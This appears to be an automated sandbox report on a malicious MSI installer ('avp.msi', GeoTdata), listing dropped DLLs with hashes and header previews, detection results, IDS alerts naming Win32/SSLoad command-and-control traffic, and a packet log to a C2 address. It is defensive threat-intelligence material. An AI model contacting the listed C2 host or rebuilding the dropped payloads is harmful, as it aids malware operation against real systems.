                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                  • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                  • Filename: payload.js, Detection: malicious, Browse
                                                  • Filename: payload.js, Detection: malicious, Browse
                                                  • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                  • Filename: sharepoint.msi, Detection: malicious, Browse
                                                  • Filename: slack.msi, Detection: malicious, Browse
                                                  • Filename: out_bdrts.js, Detection: malicious, Browse
                                                  • Filename: font.msi, Detection: malicious, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):978944
                                                  Entropy (8bit):7.28721441662179
                                                  Encrypted:false
                                                  SSDEEP:24576:rs6ZRS5J3ifJvlxfcdaeti7w+0bf0XznPMvPD:Yni8dK9CEMXD
                                                  MD5:B28A478EB5B99EFCDC7CAF428BFFB89A
                                                  SHA1:D394C7B8FE15753BFBFF79FB4F648F6F8BAE70F9
                                                  SHA-256:3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F
                                                  SHA-512:DECB2581F64949BFAAAF0368917F0705D7A4B7392EC272EDA025CF06A4384EC4CDD5202081C2E085F00645029DD96BFEF262E8628BED1861185ADF6281C1CC88
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  • Antivirus: Virustotal, Detection: 49%, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....A._.................,...........G.......P.......................................b..................................~.......v)......P........................h......................................................d............................text....0.......".................. ....itext.......@.......&.............. ..`.data.... ...P... ...0..............@....bss.....`...p...`...P...................idata...0.......*...P..............@....edata...............z..............@..@.reloc...p.......j...|..............@..B.rsrc...P...........................@..@....................................@..@........................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}, Number of Words: 10, Subject: GeoTdata, Author: Since Flawer, Name of Creating Application: GeoTdata, Template: ;1033, Comments: This installer database contains the logic and data required to install GeoTdata., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):1427968
                                                  Entropy (8bit):7.426359534364663
                                                  Encrypted:false
                                                  SSDEEP:24576:BqKxnNTYUx0ECIgYmfLVYeBZr7A9zdfoAX+8UhxcS:Bq6TYCZKumZr7ARdAAO8oxz
                                                  MD5:4D81BE09C23E02FAB7364E508C21C111
                                                  SHA1:52CAE521D7A808C8206F4B5AFD6B037BC573B50E
                                                  SHA-256:DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A
                                                  SHA-512:4F5B4FDEB9A056025455EDE8EE6E1757DA8DB64F9692DF2A46558A3C04AAEC551734B4D75803BBD579E1163B9ABA5005F71C5EFB22EE3D336779804A11B2B5A5
                                                  Malicious:false
                                                  Preview:......................>.......................................................D.......`......................................./...0...1...2...3...4...5...6...7...........................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):446944
                                                  Entropy (8bit):6.403916470886214
                                                  Encrypted:false
                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1860
                                                  Entropy (8bit):5.519080439730807
                                                  Encrypted:false
                                                  SSDEEP:48:ROMqKNfWa0SZ75LIi/6xbuP3niFLpWN5xOmZpNnD8SfWt2ie:RO/qvl5yxy6FdWNjZpNRfWtpe
                                                  MD5:696F06488F5C6FFF15E5185E8789F7E4
                                                  SHA1:DE65F89083054170930FDF17BBB0B03C88234EF7
                                                  SHA-256:180B297ABA903F43A5419D51A6753B1AA763BBC076359B9CCFF5926F4163AFB7
                                                  SHA-512:A6048F89471CD7B1E714C698E09CD255DE67AB6AB0F7E37F9DC7B485294D781385185D77A82883FE24C1A76EAB0D74A343B876085EF1A842750B718706E7D94C
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@.1.X.@.....@.....@.....@.....@.....@......&.{52EF198D-0C6C-406A-803F-F86D93DD7930}..GeoTdata..avp.msi.@.....@.....@.....@........&.{117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}.....@.....@.....@.....@.......@.....@.....@.......@......GeoTdata......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}5.C:\Users\user\AppData\Roaming\Since Flawer\GeoTdata\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}*.01:\Software\Since Flawer\GeoTdata\Version.@.......@.....@.....@......&.{698ED6C9-206D-4BB6-BF3D-8CF082F29629}(.C:\Users\user\AppData\Local\New Folder\.@.......@.....@.....@......&.{166D45B5-D23D-467B-BBDE-9EF5A3B91CB0}7.C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".5.C:\Users\user\AppData\Roaming\Since Flawer\GeoT
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):0.7679634514794053
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjqFtiAGiLIlHVRpqh/7777777777777777777777777vDHFbIMIMpZl0G:J0yQI56J5INF
                                                  MD5:565B33F7356984DAAA3BA953EF60A732
                                                  SHA1:912C6EDBB9B7A081BE94002E780B3F953D5ACA3E
                                                  SHA-256:F298ADFE2E34DEE74D6EA264B5066A90BD583C69A06FBE333FE462034D2FADE4
                                                  SHA-512:05036C446C326DC3738AE709074036DE81C1D9D54DF830CFBE11DFC696E1C4D763BD1FA12916AC74D46729FE740BD1CCE65B4B34691E42B1493ADCA8E940C25F
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.2620234904446526
                                                  Encrypted:false
                                                  SSDEEP:48:MVmudPvcFXOHT5OkQ9uD40SCoVAECiCyKToE2r0SCETmP:AmtKTkkgufoeEC7X
                                                  MD5:DABE2BE685D47D1D1ADCBD6833E2233F
                                                  SHA1:3D478D749DFD143EBD2298DF1DC4CE09FE34AEFB
                                                  SHA-256:620992A1CC8E8DEE7A13218AE5DE06BA25ECFDF6164ADB9A330C1CACAA1B3BE2
                                                  SHA-512:1936FBF99C41DAA5ED9DC1F0EB59670B7B4F477EAA068C9DDC46AE15FAA352FFB136FD9161B66F3AA195D68E236A87C8AF9704C5DA3EE0851C325E343F17DBC8
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):432221
                                                  Entropy (8bit):5.375171074333706
                                                  Encrypted:false
                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaui:zTtbmkExhMJCIpErb
                                                  MD5:610FF65A22AE7EE236D4EF8844324AF2
                                                  SHA1:A43D83F3E819EE84753A623D92DB24DDD29729F5
                                                  SHA-256:A29ED36C544F35CAE553DE09F9CE6472D3FD6B78D3618B88193635E027EBE872
                                                  SHA-512:808E508154C7BDBDDB0AB2F1CF4AC4163B0BA78FB09D4699582AD228839CEECDE32BB08DAA2665B76DADD996ADA6EC7B8D76C9290002AA703ED502A85D812A49
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.2620234904446526
                                                  Encrypted:false
                                                  SSDEEP:48:MVmudPvcFXOHT5OkQ9uD40SCoVAECiCyKToE2r0SCETmP:AmtKTkkgufoeEC7X
                                                  MD5:DABE2BE685D47D1D1ADCBD6833E2233F
                                                  SHA1:3D478D749DFD143EBD2298DF1DC4CE09FE34AEFB
                                                  SHA-256:620992A1CC8E8DEE7A13218AE5DE06BA25ECFDF6164ADB9A330C1CACAA1B3BE2
                                                  SHA-512:1936FBF99C41DAA5ED9DC1F0EB59670B7B4F477EAA068C9DDC46AE15FAA352FFB136FD9161B66F3AA195D68E236A87C8AF9704C5DA3EE0851C325E343F17DBC8
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.06852365326645236
                                                  Encrypted:false
                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOR5I9ZX8IEVk6Vky6lZ:2F0i8n0itFzDHFbIMIFZ
                                                  MD5:480AB16535BE654C5B9E3245BBF198CC
                                                  SHA1:98EAA2DD325A067685AE89D0E45FDD0B89E065D4
                                                  SHA-256:FD5293DCAE83F1A5505360681DA2D37638B75717FC68E3A11EE806958FD6A5CF
                                                  SHA-512:3EA01DE5CBE173D5ECF443E39C180AC8A909A3B5E2B849C1C6DE84ED31F7FBE8C6B3D296E66B7FFBA26852D63E9B8594CCFAA22AED24AE2CDFC17CDEB3D369B8
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):81920
                                                  Entropy (8bit):0.12876294776566635
                                                  Encrypted:false
                                                  SSDEEP:24:SPaahTxkr4ipVkrCkr4ipVkrcVAEVkryjCyKTV2BwGGKO271F+LSr:SPvTe0SCx0SCoVAECiCyKToE271FXr
                                                  MD5:674251AA6D14696A4CDFD86433F3A3E7
                                                  SHA1:0C25E1916D923F3751E9683BAF2D60C9285C72B7
                                                  SHA-256:AB828EBD611E30D9E73096200D41331CE96C4A039A177536334E38CA62289ED7
                                                  SHA-512:08D575A63DBE4A1E89B5B0BCA54792937B7AD4DBCDA196446A5A89BCCDB227FBD3E8B8E1F3E6FA0C883E92351A42B3484DC7A6192BE7C8350114671E78D535AE
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}, Number of Words: 10, Subject: GeoTdata, Author: Since Flawer, Name of Creating Application: GeoTdata, Template: ;1033, Comments: This installer database contains the logic and data required to install GeoTdata., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Entropy (8bit):7.426359534364663
                                                  TrID:
                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                  File name:avp.msi
                                                  File size:1'427'968 bytes
                                                  MD5:4d81be09c23e02fab7364e508c21c111
                                                  SHA1:52cae521d7a808c8206f4b5afd6b037bc573b50e
                                                  SHA256:dcae57ec4b69236146f744c143c42cc8bdac9da6e991904e6dbf67ec1179286a
                                                  SHA512:4f5b4fdeb9a056025455ede8ee6e1757da8db64f9692df2a46558a3c04aaec551734b4d75803bbd579e1163b9aba5005f71c5efb22ee3d336779804a11b2b5a5
                                                  SSDEEP:24576:BqKxnNTYUx0ECIgYmfLVYeBZr7A9zdfoAX+8UhxcS:Bq6TYCZKumZr7ARdAAO8oxz
                                                  TLSH:D465E0223386C637C9AD0270361A969B2578FDE74B3180D7E3C9291EEDB44D1663DF92
                                                  File Content Preview:........................>.......................................................D.......`......................................./...0...1...2...3...4...5...6...7..............................................................................................
                                                  Icon Hash:2d2e3797b32b2b99
                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  04/19/24-06:16:41.475526TCP2052099ET TROJAN Win32/SSLoad Tasking Request (POST)4973180192.168.2.485.239.53.219
                                                  04/19/24-06:15:00.345059TCP2052098ET TROJAN Win32/SSLoad Registration Activity (POST)4973180192.168.2.485.239.53.219
                                                  04/19/24-06:15:00.548302TCP2052169ET TROJAN Win32/SSLoad Registration Response804973185.239.53.219192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 19, 2024 06:14:48.639683008 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.639767885 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:48.639872074 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.643182993 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.643218994 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:48.877825022 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:48.877904892 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.881203890 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.881223917 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:48.881753922 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:48.920028925 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:48.964118004 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:49.168996096 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:49.169137955 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:49.169338942 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:49.172214985 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:49.172261953 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:14:49.172292948 CEST49730443192.168.2.4104.26.12.205
                                                  Apr 19, 2024 06:14:49.172307968 CEST44349730104.26.12.205192.168.2.4
                                                  Apr 19, 2024 06:15:00.180063963 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:00.344773054 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.345057964 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:00.345058918 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:00.345058918 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:00.509497881 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.509546041 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.548301935 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.550322056 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:00.715056896 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.730904102 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:00.786252975 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:20.734085083 CEST4973180192.168.2.485.239.53.219
